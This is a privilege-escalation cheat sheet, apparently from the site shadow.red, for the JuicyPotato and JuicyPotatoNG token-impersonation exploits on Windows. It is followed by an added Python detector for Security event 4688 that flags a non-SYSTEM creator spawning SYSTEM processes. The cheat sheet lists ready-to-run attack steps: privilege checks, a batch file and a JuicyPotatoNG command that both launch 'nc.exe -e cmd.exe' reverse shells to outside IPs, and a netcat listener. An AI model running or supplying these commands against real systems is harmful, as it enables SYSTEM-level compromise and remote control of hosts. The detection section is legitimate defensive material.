>_ shadow.red

JuicyPotato / JuicyPotatoNG

Tags: Privilege Escalation, Windows Tokens, Windows

Check privileges

whoami /priv
systeminfo

JuicyPotato needs SeImpersonatePrivilege on the current token, so confirm whoami /priv lists it; systeminfo gives the OS version used to pick the CLSID in the next step.

Pick CLSID for OS version

Pick a CLSID for the target OS version from https://github.com/ohpe/juicy-potato/tree/master/CLSID/

Prepare payload .bat

echo C:\windows\temp\test\nc.exe -e cmd.exe 10.11.134.159 444 > test.bat

Run JuicyPotato

.\JuicyPotato.exe -l 1337 -t * -p test.bat
.\JuicyPotato.exe -t * -p shell.bat -l 444 -c "{03ca98d6-ff5d-49b8-abc6-03dd84127020}"

-l is the COM server listen port on the target, -t the CreateProcess call to use (* tries both), -p the program to run and -c an explicit CLSID (omit it to use the default).

JuicyPotatoNG variant

.\JuicyPotatoNG.exe -t * -p nc.exe -a "192.168.45.165 4445 -e c:\windows\system32\cmd.exe"

-a passes the argument string to the program given with -p.

Listener

rlwrap nc -lvnp 444
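A defender-side companion to the steps above, added here and not part of the cheat sheet: a successful run ends with the service account's process creating a SYSTEM process, which Windows Security event 4688 records as a Creator Subject that is not SYSTEM and a Target Subject that is. The Python below parses 4688 events in their XML form and flags that mismatch; it assumes Windows 10 / Server 2016 or later event fields (Target Subject and Parent Process Name), a constructed allowlist of benign parents, and constructed sample events rather than real telemetry.

```python
# Added detection example, not part of the cheat sheet: flag Security event 4688
# (process creation) where a non-SYSTEM creator token produced a SYSTEM process,
# the trace a successful token impersonation leaves. Samples are constructed.
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
SYSTEM_SID = "S-1-5-18"
# Assumed allowlist of parents that legitimately start SYSTEM processes; tune it.
ALLOWED_PARENTS = {r"C:\Windows\System32\services.exe",
                   r"C:\Windows\System32\svchost.exe"}

def event_data(xml_text):
    """Return {Data Name: value} for one 4688 event rendered as XML, else None."""
    root = ET.fromstring(xml_text)
    if root.findtext(f"{NS}System/{NS}EventID") != "4688":
        return None
    return {d.get("Name"): (d.text or "") for d in root.iter(f"{NS}Data")}

def is_suspicious(d):
    """Creator (Subject) is not SYSTEM, new process (Target) runs as SYSTEM,
    and the parent is not a known service host."""
    return (d.get("TargetUserSid") == SYSTEM_SID
            and d.get("SubjectUserSid") != SYSTEM_SID
            and d.get("ParentProcessName") not in ALLOWED_PARENTS)

def scan(events):
    """Return (creator, parent, new process) tuples worth an analyst's look."""
    hits = []
    for xml_text in events:
        d = event_data(xml_text)
        if d and is_suspicious(d):
            hits.append((d["SubjectUserName"], d["ParentProcessName"],
                         d["NewProcessName"]))
    return hits

def _ev(**fields):
    # Build a minimal constructed 4688 event in the real Event/EventData schema.
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS[1:-1]}"><System><EventID>4688</EventID></System>'
            f'<EventData>{data}</EventData></Event>')

SAMPLE_EVENTS = [  # constructed: one benign service start, one impersonation
    _ev(SubjectUserSid=SYSTEM_SID, SubjectUserName="SYSTEM", TargetUserSid=SYSTEM_SID,
        ParentProcessName=r"C:\Windows\System32\services.exe",
        NewProcessName=r"C:\Windows\System32\svchost.exe"),
    _ev(SubjectUserSid="S-1-5-82-1", SubjectUserName="DefaultAppPool",
        TargetUserSid=SYSTEM_SID, ParentProcessName=r"C:\windows\temp\test\JuicyPotato.exe",
        NewProcessName=r"C:\Windows\System32\cmd.exe"),
]
```

Running scan(SAMPLE_EVENTS) returns only the app-pool-to-SYSTEM creation; in production feed it the XML of real 4688 events (for example from Get-WinEvent's ToXml()) and extend the allowlist with whatever legitimately spawns SYSTEM processes in your environment.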